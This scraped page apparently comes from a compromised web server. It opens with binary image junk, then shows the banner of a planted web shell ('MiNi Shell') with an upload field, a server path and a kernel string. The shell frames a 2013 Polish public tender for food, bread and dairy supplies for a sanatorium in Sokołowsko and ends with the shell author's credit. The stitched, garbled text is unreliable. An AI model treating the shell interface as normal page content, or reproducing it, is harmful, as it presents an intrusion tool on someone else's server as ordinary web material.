JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20130610/221640-N-2013.html

<p class="kh_header"><b>Sokołowsko: Dostawa  artykułów  spożywczych, pieczywa i artykułów nabiałowych</b><br>
<b>Numer ogłoszenia: 221640 - 2013; data zamieszczenia: 10.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Sanatoria Dolnośląskie  sp. z o.o. , ul. Parkowa 3, 58-351 Sokołowsko, woj. dolnośląskie, tel. 74 8458240, faks 74 8458237.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.sanatoria-dolnoslaskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa  artykułów  spożywczych, pieczywa i artykułów nabiałowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1	Fasola sucha op. 3kg	kg	516	
2	Groch suchy op. 3kg	kg	181	
3	Kasza gryczana op. 1 - 5 kg	kg	175	
4	Kasza jęczmienna  op.1 - 5 kg	kg	1 361	
5	Kasza kukurydziana op. 1 kg	kg	368	
6	Kasza manna op. 1 kg.	kg	818	
7	Makaron - Op. 5 kg	kg	3 100	
8	Makaron  nitki, PN A  74132 Op. 5 kg	kg	752	
9	Mąka pszenna typ 450, np. tortowa, wrocławska,  1kg	kg	4 524	
10	Mąka tortowa typ 450 op. 1 kg.	kg	480	
11	Mąka ziemniaczana  op.1kg	kg	328	
12	Płatki jęczmienne 100g	szt	210	
13	Płatki owsiane op. 1 kg.	kg	564	
14	Ryż op. 1 kg.	kg	2 168	
15	Ryż op. 4x100g	szt.	32	
				
	Zadanie 2			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1.	Ananas puszka 565g	szt.	32	
2.	Chrzan konserwowy, 200g	szt	579	
3.	Fasolka czerwona konserwowa typu  Rolnik , 	szt	50	
4	Groszek konserwowy typu  Rolnik, Pudliszki, Vernet - 400g, po odcieku 240 g	szt	1 176	
5.	Ketchup 500ml Tortex łagodny	szt	1 360	
6.	Ketchup 1l łagodny	szt	192	
7.	Koncentrat buraczany w płynie - op do. 300 ml.	szt	68	
8.	Koncentrat owocowy - syrop 0,5l	szt	1 162	
9.	Koncentrat pomidorowy 30%   1 kg 	kg	747	
10.	Majonez   op.  300 g	szt	320	
11.	Majonez   op.  900 g	szt	1 025	
12.	Margaryna na kanapki kubek 500g  typu  Delma 	szt	2 300	
13.	Margaryna zwykła kostka 250g	szt	1 628	
14.	Musztarda   op.  200 g, 900 g	kg	1 069	
15.	Ocet 10%  op. 1l	l	159	
16.	Ogórki konserwowe ok. 870 900g, po odcieku 520 540g typu  Simpol ,  Frutico ,  Frubex 	szt	1 016	
17	Olej roślinny uniwersalny 1-5l	l	1 666	
18.	Papryka konserwowa, 850 900g, po odcieku 540g typu  Simpol ,  Frubex ,  Frutico 	szt	310	
19.	Szczaw   op. 300g	szt	315	
20.	Tuńczyk w puszce/ konserwy rybne ok. 175 g	szt	390	
21.	Śledź matias op. 4kg	kg	56	
22.	Paprykarz szczeciński 330g, ryba 30%	szt	352	
23.	Konserwa rybna śledź, makrela w oleju netto 170g	szt	240	
24.	Tuńczyk w puszce 185g/masa netto 135g	szt 	160	
25.	Tuńczyk w puszce/ konserwy rybne ok 175g	szt	390	
				
				
	Zadanie 3			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1.	Biszkopty ok.150g 	szt	630	
2.	Budyń bez cukru różne smaki op.  1k g	kg	906	
3.	Ciastka   herbatniki  np. Petitki, Szkolne 100g	kg	3 760	
4.	Cukier  op.1 kg	kg	7 100	
6.	Cukier puder op. 500 g	kg	73	
7.	Cukier waniliowy 20g	szt	1 080	
8.	Dżem owocowy 1000 g lub 0,9 l	szt	1 211	
9.	Herbata ekspresowa   typu minutka torebk 100 szt.	szt	2 030	
10.	Herbata granulowana op. 200 g	szt	1 472	
11.	Herbata owocowa 20szt op	szt	10	
12.	Kakao naturalne op. 150 g	kg	11	
13.	Kawa naturalna   rozpuszczalna granulowana  op. 0,5 kg.	kg	968	
14.	Kawa zbożowa rozpuszczalna op.500 g	kg	79	
15.	Kawa zbożowa tradycyjna op.500 g	kg	60	
16.	Kisiel 1 kg	kg	1 445	
17.	Kisiel bez cukru na 3/4 l wody ok. 1 kg truskawka, malina, typu  Delecta 	kg	700	
18.	Kleik ryżowy 160g 	kg	180	
19.	Marmolada  op.1 kg 	 	90	
21.	Mleko w proszku odtłuszczone 25 kg	kg	780	
22.	Mleko w proszku pełne 0,5 kg	kg	51	
23.	Mleko w proszku pełne 25 kg	kg	780	
24.	Sok owocowo warzywny op. 1l smaki: marchew banan jabłko lub marchew jabłko	l	370	
25.	Suchary pszenne delikatesowe 290g z cukrem typu Mamut	szt	190	
26.	Wafle 150g, różne smaki, typu  Skawa ,  Grzesiek 	kg	8 010	
27.	Ciastka drobne - markizy, kruche  dżemem, rurki	kg	80	
28.	Cukier waniliowy kg	kg	4	
29.	Galaretka owocowa 	kg 	24	
30.	Wafelek bez czekolady	szt	3 840	
				
	Zadanie 4			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1.	Barszcz czerwony instant typu  Winiary ,  Knorr  3kg	kg	49	
2.	Bazylia 10g 	szt	87	
5	Czosnek granulowany 20g	szt	13	
6	Kminek 1kg	kg	4	
7.	Kminek 20g	szt	52	
8.	Koperek suszony 250g	kg	19	
9.	Kukurydza konserwowa w puszce 340g po odcieku	szt	986	
10.	Kwasek cytrynowy  op. 1 kg	kg	402	
11	Liście laurowe op. 20 g	szt	128	
12.	Liście laurowe op. 100 g	kg	133	
13.	Majeranek op. 100 g	szt	3	
14.	Majeranek op. 1kg	kg	76	
15.	Oregano 10g 	szt	40	
16.	Papryka mielona ostra 20g	szt	93	
17.	Papryka mielona słodka 20-100g	kg	194	
18.	Pieprz czarny naturalny mielony 1 kg	kg	608	
19.	Pieprz ziołowy mielony 20g, typu  Euro Konkret ,  Cykoria 	szt	96	
20.	Pieprz ziołowy op. 100 g	szt	8	
 	Przyprawa do kurczaka 20g	szt	183	
18	Pietruszka suszona 250g	kg	40	
20	Przyprawa do drobiu  op.500g 700 g typu  Edpol , knorr	kg	9	
21	Przyprawa do ryb a 600g typu  Delikat   Knorr 	kg	5	
22	Przyprawa do wieprzowiny  op.500g typu  Edpol 	kg	4	
23	Przyprawa do zup w płynie ok.1000g (860ml) typuKnorr	l	200	
24	Przyprawa do zup w płynie op. 1 litra	l	509	
25	Przyprawa jarzynka op. 0,5 kg 	kg	20	
26	Przyprawa warzywna, min. 15% warzyw suszonych,  1 kg typu  Warzywko 	kg	548	
27	Rodzynki 100g	kg	65	
28	Rosół o smaku wędzonki, w proszku, op. 15 kg typuKnorr	kg	148	
29	Sos bolones / napoli typu Knorr op.1,1kg	kg	24	
30	Sos cytrynowo - maślany  typu Knorr 0,7 kg	kg	9	
31	Sos pieczeniowy typu knorr op. 1,1 kg	kg	3	
32	Sos sałatkowy ogrodowy, grecki  op. 0,7 kg	kg	3	
33	Sól warzona - jodowana op.1 kg	kg	2 050	
34	Włoszczyzna krojona w paski  1kg	kg	200	
35	Ziele angielskie 20g	szt	262	
36	Zupa brokułowa typu Knorr  op 20-100g	kg	12	
37	Zupa porowa  typu knorr 20-100g	kg	21	
12	Zupa pieczarkowa  40g-100g	kg	444	
13	Zupa Barszcz biały 40-100 g	kg	449	
38	Żelatyna spożywcza 1000 g	kg	144	
 	Żelatyna spożywcza 50g	szt	20	
39	Żurek w proszku typu Knorr op. 3 kg	kg	393	
		 	 	
	Zadanie 5			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1.	Porzeczka czarna mrożona luzem 5 lub 7 kg	kg	25	
2.	Brokuła mrożona luzem 5 lub 7 kg	kg	445	
3.	Truskawki mrożone op. 5 kg-7 kg	kg	255	
4.	Marchew mrożona luzem op. od 5 - 7 kg	kg	108	
5.	Marchew z groszkiem mrożona 5-7 kg	kg	80	
6.	Ryba mrożona miruna, dorsz  (STH) 	kg	1 135	
7.	Ryba mrożona miruna 200-400g	kg	320	
8.	Ryba mrożona dorsz /STH/	kg	50	
9.	Fasolka szparagowa mrożona luzem op.  5 lub 7 kg	kg	175	
10.	Kalafior mrożony op. Luzem 5-7 kg	kg	440	
11.	Mieszanka warzywna mrożona 5 cio składnikowa op. Luzem 5-7 kg	kg	210	
12.	Szpinak mrożony 1 kg	kg	340	
13.	Aronia mrożona	kg	50	
14.	Wiśnia mrożona bez pestki	kg	10	
15.	Mieszanka królewska 2,5kg	kg	80	
16.	Zupa jarzynowa	kg	160	
17.	Zupa wiosenna 	kg	80	
18.	Mieszanka chińska	kg	25	
19.	Porzeczka czerwona mrozona luzem 5 lub 7 kg	kg	320	
20.	Mieszanka kompotowa mrożona luzem  op. od 5-7 kg	kg	385	
				
	Zadanie 6			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1.	Bułka śniadaniowa mini 50 g	kg	3 600	
2.	Bułka tarta 500g	kg	360	
3.	Bułka z serem 80 g	kg	600	
4.	Bułka zwykła 90g	kg	1 200	
5.	Bułki maślane 50g	kg	300	
6.	Chleb mieszany pytlowy 600g	kg	2 350	
7.	Chleb mieszany pytlowy krojony 600g	kg	23 750	
8.	Chleb bezglutenowy krojony 440g	kg	32	
9.	Chleb pszenny krojony 600g	kg	26 070	
10.	Chleb razowy krojony (mąka żytnia z pełnego przemiału) 500g	kg	13 584	
11.	Graham krojony 500g	kg	3 520	
12.	Kajzerka 50 g	szt	480	
13.	Pączek z różą 80 g	szt	3 250	
14.	Rogal 50 g	szt	3 000	
15.	Rogal drożdżowy  z jabłkami 100g	szt	1 500	
16.	Sernik lany	kg	18	
17.	Makowiec	kg	9	
18.	Babka czekoladowa	kg	298	
19.	Keks	kg	289	
20.	Murzynek	kg	18	
21.	Bułka tarta 2kg paczka	kg	96	
				
	Zadanie 7			
Lp.	Produkty	Jedn. Miary	Plan ilość/rok.	
1.	danone deser gratka trusk. 24x120g	szt	6 508	
2.	jogurt dagny 125g	szt	1 560	
3.	zott jog.nat.b/cukru 200g	szt	3 160	
4.	zott jog.nat.b/cukru 400g	szt	1 560	
5.	zott jogobella 150g	szt	7 780	
6	kefir nat.200g śrem	szt	360	
7.	masło extra 200g	szt	3 024	
8.	masło mazurskie ex.200g	szt	100	
9.	masło śmietankowe 200g	szt	5 920	
11.	mix extra  pasłęcki 200g	kg	950	
12.	gost.mleko 2% 1l uht	szt	1 000	
13.	gost.mleko 3.2%1l  uht	szt	4 440	
14.	mleko 2% folia  1l	szt	5 120	
15.	ser feta 30%/270g	szt	15	
16.	ser feta 40% 270g.	szt	80	
17.	serek wiejski 150g	szt	3 190	
18.	ser gouda plus 1kg	kg	240	
19.	ser edamski ostrołęka 1kg	kg	110	
20.	 ser gouda 1kg	kg	690	
21	zott ser plastry 150g	szt	480	
22.	hoch.ser top.plastry 150g	szt	480	
23.	ser mazowiecki 1kg	kg	90	
24.	ser morski mlekovita kg	kg	200	
25.	ser żółty pasłęk 1kg	kg	50	
26.	ser camembert 120g	szt	312	
27.	marg.dobrej gospodyni 250g	szt	5 564	
28.	marg.mleczna bielmar 250 g	szt	3 400	
29.	olej beskidzki 1l	szt	340	
30.	pasztet proch.160g	szt	1 986	
31.	ser krążki tychy 8*20 g	szt	1 230	
32.	kiri 100g	szt	1 088	
33.	ser top. hochland krążęk 8*25g	szt	1 700	
34.	ser top.60% tychy 100g	szt	2 910	
35.	zott zottarella 125g	szt	160	
36.	śmietana 12 % 400 g	szt	400	
37.	śmiet.18%250g	szt	3 440	
38.	śmietanka do kawy 10*10g	szt	250	
39.	twaróg półtłusty (folia, próżnia)  1kg	szt	600	
40.	twaróg półtłusty(papier) 1kg	kg	2 040	
41.	fromage górski mix 80g	szt	1 840	
42.	jogurt serduszko 125g	szt	3 680	
43.	ser plaster lactima 150g	szt	1 200	
44.	ser krążek lactima 8x 	szt	640	
45.	serek kanapkowy 150g	szt	1 120	
46.	serek danio smakowy	szt	480	
47.	serek jana waniliowy	szt	960.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.11.00-9, 15.33.10.00-7, 15.33.14.60-9, 15.40.00.00-2, 15.61.00.00-7, 15.87.10.00-4, 15.86.10.00-1, 15.86.30.00-5, 15.81.10.00-6, 15.81.00.00-0, 15.51.10.00-3, 15.51.00.00-6, 15.53.00.00-2, 15.54.00.00-5, 15.55.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>oświadczenie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oświadczenie Wykonawcy o spełnianiu wymagań koniecznych do zapewnienia higieny w procesie produkcji lub obrocie oraz zapewnienia jakość zdrowotną produktów</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>trony przewidują możliwość dokonywania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w każdym przypadku gdy konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub gdy zmiany te są korzystne dla Zamawiającego a także w przypadku wejścia w życie przepisów zmieniających wysokość stawki podatku VAT za poszczególne Produkty.
Każda ze stron może odstąpić od umowy za 1 miesięcznym wypowiedzeniem nie wcześniej jednak niż przed 31.12.2013 r.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.sanatoria-dolnoslaskie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Sanatoria Dolnośląskie Sp. z o.o.  Parkowa 3, Sokołowsko, kod 58-351.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.06.2013 godzina 10:00, miejsce: Sanatoria Dolnośląskie Sp. z o.o.  Parkowa 3, Sokołowsko, kod 58-351  sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com